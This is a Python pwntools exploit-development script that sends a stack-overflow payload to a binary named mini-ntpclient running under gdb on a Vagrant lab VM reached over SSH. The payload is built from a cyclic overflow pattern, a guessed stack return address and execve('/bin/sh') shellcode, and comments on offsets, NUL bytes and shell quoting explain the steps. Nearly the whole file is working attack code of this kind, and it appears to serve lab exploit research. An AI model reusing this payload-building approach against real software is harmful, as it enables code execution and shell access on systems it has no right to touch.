0day_dev/exploit.py


from pwn import *
import base64
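# Offset (bytes) at which the target crashed in the last run; an earlier run
# gave 0x107.  Kept as a record of the observed overflow size.
crash_at = 264
# Value found in EIP at the crash (an earlier run showed 0x61616663, i.e.
# 'cfaa' from a cyclic pattern).  cyclic_find(eip_crash) only yields an offset
# when the value comes from the pattern's alphabet; 0x43424242 ('BBBC') is not
# in pwntools' default lowercase alphabet, so it would report -1 — confirm
# against the real crash before using it.
eip_crash = 0x43424242


def _bash_ansi_c_quote(data: bytes) -> str:
    """Return *data* as one bash ANSI-C quoted word, e.g. ``$'\\x41\\x07'``.

    gdb's ``run`` hands its arguments to a shell, so raw bytes have to be
    spelled as escapes the shell converts back.  Every byte is written as a
    two-digit ``\\xNN`` escape: ``%x`` alone would drop the leading zero of
    values below 0x10, and the quoting keeps spaces, quotes and backslashes
    in the payload from splitting or corrupting the word.

    Caveats: a 0x00 byte cannot be carried in an argv string at all, and the
    ``$'...'`` form requires bash (or another shell with ANSI-C quoting) as
    gdb's startup shell — ``show startup-with-shell`` / ``$SHELL`` on the
    target decide that.
    """
    return "$'" + "".join("\\x%02x" % byte for byte in data) + "'"


def main() -> None:
    """Connect to the lab VM, build the payload and start the target under gdb."""
    # Must run before shellcraft/asm/pack: selects 32-bit x86 Linux encodings.
    context.update(arch='i686', os='linux')
    # Lab target: a Vagrant box whose SSH port is forwarded to 2222.  The
    # session relies on key/agent auth (no password is passed).
    ssh_connection = ssh('vagrant', 'default', port=2222)
    # Keep one shell open so several commands land in the same session.
    bash = ssh_connection.run('bash')

    # Guessed stack address to land on; it must be re-read from gdb on the
    # target, since the stack layout differs between environments.
    esp_location = pack(0xbffff600)
    shellcode = shellcraft.sh()
    # Overflow pattern, then the guessed return address, then the
    # execve("/bin/sh") stub.
    payload = cyclic(300) + esp_location + asm(shellcode)
    print(shellcraft.sh())
    if b'\x00' in payload:
        # argv strings end at the first NUL, so everything after it is lost.
        # pack(0xbffff600) starts with a 0x00 byte, so this fires with the
        # address above; pick a NUL-free address or a different delivery path.
        print('WARNING: payload contains 0x00 - argv truncates at the first NUL')

    # Core dumps on for post-mortem analysis of the crash.
    bash.sendline('ulimit -c unlimited')
    bash.sendline('gdb /vagrant/mini-ntpclient ')
    bash.sendline('run ' + _bash_ansi_c_quote(payload))
    # Hand the gdb session back to the operator.
    bash.interactive()


if __name__ == "__main__":
    main()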